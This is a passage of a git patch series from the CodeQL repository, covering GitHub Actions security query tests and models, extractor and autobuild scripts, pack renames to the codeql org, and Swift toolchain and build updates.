b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref deleted file mode 100644 index 01235fb6a20..00000000000 --- a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-571/ExpressionIsAlwaysTrue.ql diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected new file mode 100644 index 00000000000..2ef457d9e01 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected @@ -0,0 +1,11 @@ +| .github/workflows/test2.yml:15:13:19:13 | \| | Expression always evaluates to true | +| .github/workflows/test2.yml:34:13:34:54 | ${{ 1 = ... foo" }} | Expression always evaluates to true | +| .github/workflows/test2.yml:45:13:48:24 | > | Expression always evaluates to true | +| .github/workflows/test2.yml:56:15:56:44 | " ${{ g ... 11 }}" | Expression always evaluates to true | +| .github/workflows/test2.yml:59:15:59:44 | " ${{ g ... 11 }}" | Expression always evaluates to true | +| .github/workflows/test2.yml:79:13:82:14 | \|+ | Expression always evaluates to true | +| .github/workflows/test2.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test2.yml:91:13:91:40 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test2.yml:94:13:94:141 | ${{ con ... e[bot]' | Expression always evaluates to true | +| .github/workflows/test2.yml:97:13:97:37 | ${{ git ... } != "" | Expression always evaluates to true | +| .github/workflows/test2.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref new file mode 100644 index 00000000000..823f802a70f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected new file mode 100644 index 00000000000..c853603377c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected @@ -0,0 +1,11 @@ +| .github/workflows/test1.yml:15:13:19:13 | \| | Expression always evaluates to true | +| .github/workflows/test1.yml:34:13:34:39 | ${{ 1 = ... == 2 }} | Expression always evaluates to true | +| .github/workflows/test1.yml:45:13:48:24 | > | Expression always evaluates to true | +| .github/workflows/test1.yml:56:15:56:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test1.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test1.yml:79:13:82:14 | \|+ | Expression always evaluates to true | +| .github/workflows/test1.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test1.yml:91:13:91:45 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test1.yml:94:13:94:121 | ${{ con ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test1.yml:97:13:97:64 | ${{ has ... } != "" | Expression always evaluates to true | +| .github/workflows/test1.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref new file mode 100644 index 00000000000..f12135bd1b8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql From 4f62573d1778a07a4dd8ff86510ca66ba6f24c15 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Nov 2024 10:11:52 +0100 Subject: [PATCH 0682/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d34dad6665c..a7df1c400bf 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.84 +version: 0.1.85 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 007c2ebbe95..96ba9840785 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.84 +version: 0.1.85 groups: [actions, queries] suites: codeql-suites extractor: javascript From ae6856ab5a2d1b775e16859b3f0146b6496578d0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Nov 2024 14:44:13 +0100 Subject: [PATCH 0683/1267] models: add new control check model --- ql/lib/codeql/actions/security/ControlChecks.qll | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index a24fd44b865..244c04310d6 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -267,6 +267,13 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { class PermissionActionCheck extends PermissionCheck instanceof UsesStep { PermissionActionCheck() { + this.getCallee() = "actions-cool/check-user-permission" and + ( + // default permission level is write + not exists(this.getArgument("permission-level")) or + this.getArgument("require") = ["write", "admin"] + ) + or this.getCallee() = "sushichop/action-repository-permission" and this.getArgument("required-permission") = ["write", "admin"] or From 5bf02e73ea2ab7cc8e12ef8fd784df1a183f007a Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Mon, 4 Nov 2024 11:30:29 -0500 Subject: [PATCH 0684/1267] Update ql/src/Security/CWE-829/UnpinnedActionsTag.ql MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Alvaro Muñoz --- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 10c21bc368b..95498d6be5a 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -18,7 +18,7 @@ private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f bindingset[repo] private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) + repo.matches(["actions", "github", "advanced-security"] + "/%")) } from UsesStep uses, string repo, string version, Workflow workflow, string name From c875667980f1873bf25e54e7d04e28a28e78a9ea Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 6 Nov 2024 08:05:14 +0100 Subject: [PATCH 0685/1267] Swift: update to 6.0.2 --- swift/third_party/load.bzl | 31 +++++++++++++++---------- swift/third_party/resources/updating.md | 4 ++-- 2 files changed, 21 insertions(+), 14 deletions(-) diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index dd8470a023f..542eec4d9f9 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -5,23 +5,30 @@ load("//misc/bazel:lfs.bzl", "lfs_archive", "lfs_files") _override = { # these are used to test new artifacts. Must be empty before merging to main - "swift-prebuilt-macOS.tar.zst": "4679ad4086ac6894e2f8a6bd71c5033941c894844809bf988dacb8af0c384416", - "swift-prebuilt-Linux.tar.zst": "c45976d50670964132cef1dcf98bccd3fff809d33b2207a85cf3cfd07ec84528", - "resource-dir-macOS.zip": "286e4403aa0a56641c2789e82036481535e336484f2c760bec0f42e3afe5dd87", - "resource-dir-Linux.zip": "16a1760f152395377a580a994885e0877338279125834463a6a38f4006ad61ca", + "swift-prebuilt-macOS-swift-6.0.2-RELEASE-25.tar.zst": "4c81917da67ff2bb642ef2e34e005466b06f756c958702ec070bcacdb83c2f76", + "swift-prebuilt-Linux-swift-6.0.2-RELEASE-25.tar.zst": "af1e3355fb476538449424a74f15ce21a0f877c7f85a568e736f0bd6c0239a8f", + "resource-dir-macOS-swift-6.0.2-RELEASE-33.zip": "38f48790fea144b7cf5918b885f32a0f68e21aa5f3c2f0a5722573cc9e950639", + "resource-dir-Linux-swift-6.0.2-RELEASE-33.zip": "403374c72e20299951c2c37185404500d15340baaa52bb2d06f8815b03f8071e", } -_staging_url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/staging-{file}/{file}" +_staging_url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/staging-{}/{}" + +def _get_override(file): + prefix, _, _ = file.partition(".") + for key, value in _override.items(): + if key.startswith(prefix): + return {"url": _staging_url.format(prefix, key), "sha256": value} + return None def _load_resource_dir(plat): name = "swift-resource-dir-%s" % plat.lower() file = "resource-dir-%s.zip" % plat - if file in _override: + override = _get_override(file) + if override: http_file( name = name, - url = _staging_url.format(file = file), - sha256 = _override[file], downloaded_file_path = file, + **override ) else: lfs_files( @@ -32,13 +39,13 @@ def _load_resource_dir(plat): def _load_prebuilt(plat): name = "swift-prebuilt-%s" % plat.lower() file = "swift-prebuilt-%s.tar.zst" % plat + override = _get_override(file) build = _build % "swift-llvm-support" - if file in _override: + if override: http_archive( name = name, - url = _staging_url.format(file = file), - sha256 = _override[file], build_file = build, + **override ) else: lfs_archive( @@ -91,7 +98,7 @@ swift_deps = module_extension(load_dependencies) def test_no_override(): test_body = ["#!/bin/bash", ""] test_body += [ - 'echo \\"%s\\" overridden in swift/third/party/load.bzl' % key + 'echo \\"%s\\" override in swift/third/party/load.bzl' % key for key in _override ] if _override: diff --git a/swift/third_party/resources/updating.md b/swift/third_party/resources/updating.md index 9855eeecd9c..472e74a8b3e 100644 --- a/swift/third_party/resources/updating.md +++ b/swift/third_party/resources/updating.md @@ -2,9 +2,9 @@ These files can only be updated having access for the internal repository at the In order to perform a Swift update: -1. Dispatch the https://github.com/github/semmle-code/actions/workflows/__swift-prebuild.yml with the appropriate swift +1. Dispatch the [internal `swift-prebuild` workflow](https://github.com/github/semmle-code/actions/workflows/__swift-prebuild.yml) with the appropriate swift tag. -2. Dispatch the https://github.com/github/semmle-code/actions/workflows/__swift-prepare-resource-dir.yml with the +2. Dispatch [internal `swift-prepare-resource-dir` workflow](https://github.com/github/semmle-code/actions/workflows/__swift-prepare-resource-dir.yml) with the appropriate swift tag. 3. Once the jobs finish, staged artifacts are available at https://github.com/dsp-testing/codeql-swift-artifacts/releases. Copy and paste the sha256 within the `_override` From 9e1e56f769cc2ed95551dba79fe65d4491175f34 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 6 Nov 2024 08:39:53 +0100 Subject: [PATCH 0686/1267] Swift: remove obsolete bazel definitions --- swift/BUILD.bazel | 27 --------------------------- 1 file changed, 27 deletions(-) diff --git a/swift/BUILD.bazel b/swift/BUILD.bazel index 52509a0963c..dc85033f76f 100644 --- a/swift/BUILD.bazel +++ b/swift/BUILD.bazel @@ -1,5 +1,4 @@ load("@rules_pkg//pkg:mappings.bzl", "pkg_filegroup") -load("//:defs.bzl", "codeql_platform") load( "//misc/bazel:pkg.bzl", "codeql_pack", @@ -90,29 +89,3 @@ alias( name = "create-extractor-pack", actual = ":swift-installer", ) - -# TODO: following rules are for internal repo backward compatibility only -alias( - name = "extractor-pack-generic", - actual = "swift-generic", - visibility = ["//visibility:public"], -) - -pkg_filegroup( - name = "resource-dir", - srcs = select({ - "@platforms//os:linux": ["@swift_toolchain_linux//:resource-dir-files"], - "@platforms//os:macos": ["@swift_toolchain_macos//:resource-dir-files"], - "@platforms//os:windows": [], - }), - prefix = "resource-dir/" + codeql_platform, -) - -pkg_filegroup( - name = "extractor-pack-arch", - srcs = [ - ":resource-dir", - ":swift-arch", - ], - visibility = ["//visibility:public"], -) From 02a0021a26d28b7f9f905e6a7303da02db2810df Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 6 Nov 2024 08:40:12 +0100 Subject: [PATCH 0687/1267] Swift: tweak mangling of extensions --- swift/extractor/mangler/SwiftMangler.cpp | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/swift/extractor/mangler/SwiftMangler.cpp b/swift/extractor/mangler/SwiftMangler.cpp index 04e04fd6fbc..02465b1988a 100644 --- a/swift/extractor/mangler/SwiftMangler.cpp +++ b/swift/extractor/mangler/SwiftMangler.cpp @@ -99,7 +99,8 @@ SwiftMangledName SwiftMangler::visitExtensionDecl(const swift::ExtensionDecl* de } auto parent = getParent(decl); - return initMangled(decl) << fetch(parent) << getExtensionIndex(decl, parent); + auto target = decl->getExtendedType(); + return initMangled(decl) << fetch(target) << getExtensionIndex(decl, parent); } unsigned SwiftMangler::getExtensionIndex(const swift::ExtensionDecl* decl, From 51f7129c7974dc0bccaff503d477bab7ce0eb3d5 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 6 Nov 2024 08:40:29 +0100 Subject: [PATCH 0688/1267] Swift: accept integration test change --- .../integration-tests/posix/deduplication/BuiltinTypes.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/swift/ql/integration-tests/posix/deduplication/BuiltinTypes.expected b/swift/ql/integration-tests/posix/deduplication/BuiltinTypes.expected index b2a2f45a2b9..ab0d6f17ad5 100644 --- a/swift/ql/integration-tests/posix/deduplication/BuiltinTypes.expected +++ b/swift/ql/integration-tests/posix/deduplication/BuiltinTypes.expected @@ -7,6 +7,7 @@ | Builtin.Int16 | BuiltinIntegerType | | Builtin.Int32 | BuiltinIntegerType | | Builtin.Int64 | BuiltinIntegerType | +| Builtin.Int128 | BuiltinIntegerType | | Builtin.IntLiteral | BuiltinIntegerLiteralType | | Builtin.Job | BuiltinJobType | | Builtin.NativeObject | BuiltinNativeObjectType | From 686e30a52a65d6a83e532cd6c8ece34849938ad3 Mon Sep 17 00:00:00 2001 From: Brandon Stewart <20469703+boveus@users.noreply.github.com> Date: Wed, 6 Nov 2024 20:20:26 +0000 Subject: [PATCH 0689/1267] add qlhelp --- .../CodeQL/UnnecessaryUseOfAdvancedConfig.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md diff --git a/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md new file mode 100644 index 00000000000..21a56e8d84d --- /dev/null +++ b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md @@ -0,0 +1,13 @@ +# Unneccesary use of advanced configuration + +## Description + +The CodeQL workflow does not use any custom settings and could be simplified by switching to the CodeQL default setup. + +## Recommendations + +If there is no reason to have a custom configuration switch to the CodeQL default setup. + +## References + +- [GitHub Docs: Configuring Default Setup for a repository](https://docs.github.com/en/code-security/code-scanning/enabling-code-scanning/configuring-default-setup-for-code-scanning#configuring-default-setup-for-a-repository) \ No newline at end of file From 99a49fb27fac14f93c8fb6848ebbbef8a4c6e799 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Thu, 7 Nov 2024 10:43:05 -0500 Subject: [PATCH 0690/1267] Move packs to `codeql` org --- BUILD.bazel | 20 ++++++++++++++ extractor/BUILD.bazel | 10 +++++++ extractor/codeql-extractor.yml | 44 ++++++++++++++++++++++++++++++ extractor/tools/autobuild-impl.ps1 | 40 +++++++++++++++++++++++++++ extractor/tools/autobuild.cmd | 3 ++ extractor/tools/autobuild.sh | 39 ++++++++++++++++++++++++++ ql/lib/qlpack.yml | 8 +++--- ql/src/codeql-pack.lock.yml | 22 +++++++++++---- ql/src/qlpack.yml | 6 ++-- ql/test/qlpack.yml | 10 +++---- 10 files changed, 184 insertions(+), 18 deletions(-) create mode 100644 BUILD.bazel create mode 100644 extractor/BUILD.bazel create mode 100644 extractor/codeql-extractor.yml create mode 100644 extractor/tools/autobuild-impl.ps1 create mode 100644 extractor/tools/autobuild.cmd create mode 100644 extractor/tools/autobuild.sh diff --git a/BUILD.bazel b/BUILD.bazel new file mode 100644 index 00000000000..643d4089718 --- /dev/null +++ b/BUILD.bazel @@ -0,0 +1,20 @@ +load("//misc/bazel:pkg.bzl", "codeql_pack") + +package(default_visibility = ["//visibility:public"]) + +[ + codeql_pack( + name = "-".join(parts), + srcs = [ + "//actions/extractor", + ], + pack_prefix = "/".join(parts), + ) + for parts in ( + [ + "experimental", + "actions", + ], + ["actions"], + ) +] diff --git a/extractor/BUILD.bazel b/extractor/BUILD.bazel new file mode 100644 index 00000000000..e6780e10db2 --- /dev/null +++ b/extractor/BUILD.bazel @@ -0,0 +1,10 @@ +load("//misc/bazel:pkg.bzl", "codeql_pkg_files", "strip_prefix") + +codeql_pkg_files( + name = "extractor", + srcs = [ + "codeql-extractor.yml", + ] + glob(["tools/**"]), + strip_prefix = strip_prefix.from_pkg(), + visibility = ["//actions:__pkg__"], +) diff --git a/extractor/codeql-extractor.yml b/extractor/codeql-extractor.yml new file mode 100644 index 00000000000..ab737491005 --- /dev/null +++ b/extractor/codeql-extractor.yml @@ -0,0 +1,44 @@ +name: "actions" +aliases: [] +display_name: "GitHub Actions" +version: 0.0.1 +column_kind: "utf16" +unicode_newlines: true +build_modes: + - none +file_coverage_languages: [] +github_api_languages: [] +scc_languages: [] +file_types: + - name: workflow + display_name: GitHub Actions workflow files + extensions: + - .yml + - .yaml +forwarded_extractor_name: javascript +options: + trap: + title: TRAP options + description: Options about how the extractor handles TRAP files + type: object + visibility: 3 + properties: + cache: + title: TRAP cache options + description: Options about how the extractor handles its TRAP cache + type: object + properties: + dir: + title: TRAP cache directory + description: The directory of the TRAP cache to use + type: string + bound: + title: TRAP cache bound + description: A soft limit (in MB) on the size of the TRAP cache + type: string + pattern: "[0-9]+" + write: + title: TRAP cache writeable + description: Whether to write to the TRAP cache as well as reading it + type: string + pattern: "(true|TRUE|false|FALSE)" diff --git a/extractor/tools/autobuild-impl.ps1 b/extractor/tools/autobuild-impl.ps1 new file mode 100644 index 00000000000..6ae433f2599 --- /dev/null +++ b/extractor/tools/autobuild-impl.ps1 @@ -0,0 +1,40 @@ +if (($null -ne $env:LGTM_INDEX_INCLUDE) -or ($null -ne $env:LGTM_INDEX_EXCLUDE) -or ($null -ne $env:LGTM_INDEX_FILTERS)) { + Write-Output 'Path filters set. Passing them through to the JavaScript extractor.' +} else { + Write-Output 'No path filters set. Using the default filters.' + $DefaultPathFilters = @( + 'exclude:**/*', + 'include:.github/workflows/**/*.yml', + 'include:.github/workflows/**/*.yaml', + 'include:**/action.yml', + 'include:**/action.yaml' + ) + + $env:LGTM_INDEX_FILTERS = $DefaultPathFilters -join "`n" +} + +# Find the JavaScript extractor directory via `codeql resolve extractor`. +$CodeQL = Join-Path $env:CODEQL_DIST 'codeql.exe' +$env:CODEQL_EXTRACTOR_JAVASCRIPT_ROOT = &$CodeQL resolve extractor --language javascript +if ($LASTEXITCODE -ne 0) { + throw 'Failed to resolve JavaScript extractor.' +} + +Write-Output "Found JavaScript extractor at '${env:CODEQL_EXTRACTOR_JAVASCRIPT_ROOT}'." + +# Run the JavaScript autobuilder. +$JavaScriptAutoBuild = Join-Path $env:CODEQL_EXTRACTOR_JAVASCRIPT_ROOT 'tools\autobuild.cmd' +Write-Output "Running JavaScript autobuilder at '${JavaScriptAutoBuild}'." + +# Copy the values of the Actions extractor environment variables to the JavaScript extractor environment variables. +$env:CODEQL_EXTRACTOR_JAVASCRIPT_DIAGNOSTIC_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_DIAGNOSTIC_DIR +$env:CODEQL_EXTRACTOR_JAVASCRIPT_LOG_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_LOG_DIR +$env:CODEQL_EXTRACTOR_JAVASCRIPT_SCRATCH_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_SCRATCH_DIR +$env:CODEQL_EXTRACTOR_JAVASCRIPT_SOURCE_ARCHIVE_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_SOURCE_ARCHIVE_DIR +$env:CODEQL_EXTRACTOR_JAVASCRIPT_TRAP_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_TRAP_DIR +$env:CODEQL_EXTRACTOR_JAVASCRIPT_WIP_DATABASE = $env:CODEQL_EXTRACTOR_ACTIONS_WIP_DATABASE + +&$JavaScriptAutoBuild +if ($LASTEXITCODE -ne 0) { + throw "JavaScript autobuilder failed." +} diff --git a/extractor/tools/autobuild.cmd b/extractor/tools/autobuild.cmd new file mode 100644 index 00000000000..ff5ca89d94a --- /dev/null +++ b/extractor/tools/autobuild.cmd @@ -0,0 +1,3 @@ +@echo off +rem All of the work is done in the PowerShell script +powershell.exe %~dp0autobuild-impl.ps1 diff --git a/extractor/tools/autobuild.sh b/extractor/tools/autobuild.sh new file mode 100644 index 00000000000..57adbf96279 --- /dev/null +++ b/extractor/tools/autobuild.sh @@ -0,0 +1,39 @@ +#!/bin/sh + +set -eu + +DEFAULT_PATH_FILTERS=$(cat << END +exclude:**/* +include:.github/workflows/**/*.yml +include:.github/workflows/**/*.yaml +include:**/action.yml +include:**/action.yaml +END +) + +if [ -n "${LGTM_INDEX_INCLUDE:-}" ] || [ -n "${LGTM_INDEX_EXCLUDE:-}" ] || [ -n "${LGTM_INDEX_FILTERS:-}" ] ; then + echo "Path filters set. Passing them through to the JavaScript extractor." +else + echo "No path filters set. Using the default filters." + LGTM_INDEX_FILTERS="${DEFAULT_PATH_FILTERS}" + export LGTM_INDEX_FILTERS +fi + +# Find the JavaScript extractor directory via `codeql resolve extractor`. +CODEQL_EXTRACTOR_JAVASCRIPT_ROOT="$($CODEQL_DIST/codeql resolve extractor --language javascript)" +export CODEQL_EXTRACTOR_JAVASCRIPT_ROOT + +echo "Found JavaScript extractor at '${CODEQL_EXTRACTOR_JAVASCRIPT_ROOT}'." + +# Run the JavaScript autobuilder +JAVASCRIPT_AUTO_BUILD="${CODEQL_EXTRACTOR_JAVASCRIPT_ROOT}/tools/autobuild.sh" +echo "Running JavaScript autobuilder at '${JAVASCRIPT_AUTO_BUILD}'." + +# Copy the values of the Actions extractor environment variables to the JavaScript extractor environment variables. +env CODEQL_EXTRACTOR_JAVASCRIPT_DIAGNOSTIC_DIR="${CODEQL_EXTRACTOR_ACTIONS_DIAGNOSTIC_DIR}" \ + CODEQL_EXTRACTOR_JAVASCRIPT_LOG_DIR="${CODEQL_EXTRACTOR_ACTIONS_LOG_DIR}" \ + CODEQL_EXTRACTOR_JAVASCRIPT_SCRATCH_DIR="${CODEQL_EXTRACTOR_ACTIONS_SCRATCH_DIR}" \ + CODEQL_EXTRACTOR_JAVASCRIPT_SOURCE_ARCHIVE_DIR="${CODEQL_EXTRACTOR_ACTIONS_SOURCE_ARCHIVE_DIR}" \ + CODEQL_EXTRACTOR_JAVASCRIPT_TRAP_DIR="${CODEQL_EXTRACTOR_ACTIONS_TRAP_DIR}" \ + CODEQL_EXTRACTOR_JAVASCRIPT_WIP_DATABASE="${CODEQL_EXTRACTOR_ACTIONS_WIP_DATABASE}" \ + ${JAVASCRIPT_AUTO_BUILD} diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a7df1c400bf..823e6a76cbc 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -1,16 +1,16 @@ --- library: true warnOnImplicitThis: true -name: github/actions-all +name: codeql/actions-all version: 0.1.85 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 codeql/controlflow: ^1.0.1 codeql/dataflow: ^1.0.1 -extractor: javascript -dbscheme: semmlecode.javascript.dbscheme -groups: javascript + codeql/javascript-all: ^2.0.2 +extractor: actions +groups: actions dataExtensions: - ext/manual/*.model.yml - ext/generated/**/*.model.yml diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 21e0b8bb0e9..c4ef87bc251 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -2,15 +2,25 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.1 + version: 1.0.10 codeql/dataflow: - version: 1.0.1 + version: 1.1.4 + codeql/javascript-all: + version: 2.0.2 + codeql/mad: + version: 1.0.10 + codeql/regex: + version: 1.0.10 codeql/ssa: - version: 1.0.1 + version: 1.0.10 + codeql/tutorial: + version: 1.0.10 codeql/typetracking: - version: 1.0.1 + version: 1.0.10 codeql/util: - version: 1.0.1 + version: 1.0.10 + codeql/xml: + version: 1.0.10 codeql/yaml: - version: 1.0.1 + version: 1.0.10 compiled: false diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 96ba9840785..c907bbab1d0 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,11 +1,11 @@ --- library: false -name: github/actions-queries +name: codeql/actions-queries version: 0.1.85 groups: [actions, queries] suites: codeql-suites -extractor: javascript +extractor: actions defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: - github/actions-all: ${workspace} + codeql/actions-all: ${workspace} warnOnImplicitThis: true diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml index 77e25d8e419..893532481ec 100644 --- a/ql/test/qlpack.yml +++ b/ql/test/qlpack.yml @@ -1,10 +1,10 @@ --- -name: github/actions-tests -groups: [javascript, test] +name: codeql/actions-tests +groups: [codeql, test] dependencies: - github/actions-all: ${workspace} - github/actions-queries: ${workspace} -extractor: javascript + codeql/actions-all: ${workspace} + codeql/actions-queries: ${workspace} +extractor: actions tests: . warnOnImplicitThis: true From b2100d00aa091c9cbda89803f5d3e216ed2d4cfc Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Thu, 7 Nov 2024 11:15:34 -0500 Subject: [PATCH 0691/1267] Add `security-and-quality` suite --- ql/src/codeql-suites/actions-security-and-quality.qls | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 ql/src/codeql-suites/actions-security-and-quality.qls diff --git a/ql/src/codeql-suites/actions-security-and-quality.qls b/ql/src/codeql-suites/actions-security-and-quality.qls new file mode 100644 index 00000000000..ef332acb872 --- /dev/null +++ b/ql/src/codeql-suites/actions-security-and-quality.qls @@ -0,0 +1,11 @@ +- description: Security-and-quality queries for Actions +- queries: '.' +- include: + problem.severity: + - error + - recommendation +- exclude: + tags contain: + - experimental + - debug + From 1f3bab2b65934888d9b6323df6f1848003222671 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Thu, 7 Nov 2024 11:15:52 -0500 Subject: [PATCH 0692/1267] Move data extensions to use `codeql` org --- ql/lib/codeql-pack.lock.yml | 22 ++++++++++++++----- .../ext/config/argument_injection_sinks.yml | 2 +- ql/lib/ext/config/context_event_map.yml | 2 +- .../config/externally_triggereable_events.yml | 2 +- ql/lib/ext/config/poisonable_steps.yml | 6 ++--- .../ext/config/untrusted_event_properties.yml | 2 +- ql/lib/ext/config/untrusted_gh_command.yml | 2 +- ql/lib/ext/config/untrusted_git_command.yml | 2 +- ql/lib/ext/config/vulnerable_actions.yml | 2 +- ql/lib/ext/config/workflow_runtime_data.yml | 4 ++-- ...ctions_actions-runner-controller.model.yml | 2 +- .../composite-actions/adap_flower.model.yml | 2 +- .../agoric_agoric-sdk.model.yml | 2 +- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../amazon-ion_ion-java.model.yml | 2 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 2 +- .../ansible_ansible-lint.model.yml | 2 +- .../composite-actions/ansible_awx.model.yml | 2 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 2 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 2 +- .../composite-actions/apache_camel.model.yml | 2 +- .../composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../composite-actions/apache_nuttx.model.yml | 2 +- .../apache_opendal.model.yml | 2 +- .../composite-actions/apache_pekko.model.yml | 2 +- .../apache_pulsar-helm-chart.model.yml | 2 +- .../apache_superset.model.yml | 2 +- .../appflowy-io_appflowy.model.yml | 2 +- .../aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 2 +- .../auth0_auth0-java.model.yml | 2 +- .../auth0_auth0.net.model.yml | 2 +- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 2 +- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- ...ertools_powertools-lambda-python.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../azure_azure-datafactory.model.yml | 2 +- .../badges_shields.model.yml | 2 